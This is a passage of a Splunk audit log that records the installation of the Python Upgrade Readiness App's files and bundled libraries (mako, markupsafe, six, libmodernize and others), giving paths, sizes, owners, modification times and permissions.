action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_itertools_six.py", isdir=0, size=2074, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.653, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_itertools_imports_six.py", isdir=0, size=2407, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.647, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_int_long_tuple.py", isdir=0, size=559, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.643, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_input_six.py", isdir=0, size=1262, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.639, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_imports_six.py", isdir=0, size=2470, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.636, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_import.py", isdir=0, size=802, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.632, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_filter.py", isdir=0, size=615, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.629, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_file.py", isdir=0, size=427, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.625, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_dict_six.py", isdir=0, size=1271, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.620, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_classic_division.py", isdir=0, size=647, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.615, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_basestring.py", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.611, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/__init__.py", isdir=0, size=1747, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.406, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/main.py", isdir=0, size=8291, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.402, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.397, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/__init__.py", isdir=0, size=3462, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.292, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info/top_level.txt", isdir=0, size=11, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.287, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.283, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info/RECORD", isdir=0, size=1049, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.279, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info/METADATA", isdir=0, size=1915, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.273, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info/LICENSE", isdir=0, size=2395, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.267, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.262, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/markupsafe/_speedups.c", isdir=0, size=9884, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.257, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/markupsafe/_native.py", isdir=0, size=1873, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.253, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/markupsafe/_constants.py", isdir=0, size=4690, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.247, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/markupsafe/_compat.py", isdir=0, size=558, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.241, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/markupsafe/__init__.py", isdir=0, size=10126, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.136, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/checksumdir/py.typed", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.133, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/checksumdir/cli.py", isdir=0, size=1668, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.128, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/checksumdir/__init__.pyi", isdir=0, size=521, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.124, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/checksumdir/__init__.py", isdir=0, size=2087, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.120, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info/top_level.txt", isdir=0, size=11, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.115, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.112, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info/RECORD", isdir=0, size=1076, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.108, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info/METADATA", isdir=0, size=3570, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.104, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info/LICENSE.txt", isdir=0, size=1475, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.101, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.096, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info/top_level.txt", isdir=0, size=5, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.093, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info/entry_points.txt", isdir=0, size=586, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.087, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info/WHEEL", isdir=0, size=93, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.084, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info/RECORD", isdir=0, size=3037, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.078, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info/METADATA", isdir=0, size=2438, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.074, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.969, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/turbogears.py", isdir=0, size=2165, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.962, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/pygmentplugin.py", isdir=0, size=4951, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.956, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/preprocessors.py", isdir=0, size=576, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.952, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/linguaplugin.py", isdir=0, size=1954, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.948, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/extract.py", isdir=0, size=4616, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.942, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/beaker_cache.py", isdir=0, size=2599, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.938, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/babelplugin.py", isdir=0, size=2138, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.933, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/autohandler.py", isdir=0, size=1885, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.929, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.824, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/util.py", isdir=0, size=10993, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.819, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/template.py", isdir=0, size=26411, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.814, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/runtime.py", isdir=0, size=28020, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.811, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/pyparser.py", isdir=0, size=7789, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.807, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/pygen.py", isdir=0, size=9938, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.802, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/parsetree.py", isdir=0, size=19411, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.797, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/lookup.py", isdir=0, size=12718, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.791, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/lexer.py", isdir=0, size=16926, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.785, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/filters.py", isdir=0, size=6063, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.781, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ext", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.777, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/exceptions.py", isdir=0, size=13003, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.772, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/compat.py", isdir=0, size=5228, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.768, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/codegen.py", isdir=0, size=47881, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.763, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/cmd.py", isdir=0, size=2471, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.758, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/cache.py", isdir=0, size=7736, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.752, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/ast.py", isdir=0, size=6789, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.749, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/_ast_util.py", isdir=0, size=20414, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.745, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako/__init__.py", isdir=0, size=243, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.641, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunkbaseapps.csv", isdir=0, size=417049, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.635, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.632, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six.py", isdir=0, size=32452, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.627, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.622, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/pura_version_bifurcator.py", isdir=0, size=6074, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.619, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/pura_utils.py", isdir=0, size=3338, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.615, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/pura_logger_manager.py", isdir=0, size=1402, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.611, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/pura_consts.py", isdir=0, size=17575, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.607, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.601, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/markupsafe", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.598, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/mako", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.593, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.589, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.585, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.581, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.578, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then-0.1.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.574, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.570, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures-3.3.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.562, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.557, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/checksumdir", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.553, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.548, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.543, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/MarkupSafe-1.1.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.539, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/Mako-1.0.12.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.234, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.229, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/scan_process.py", isdir=0, size=61590, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.224, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_telemetry.py", isdir=0, size=11584, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.218, 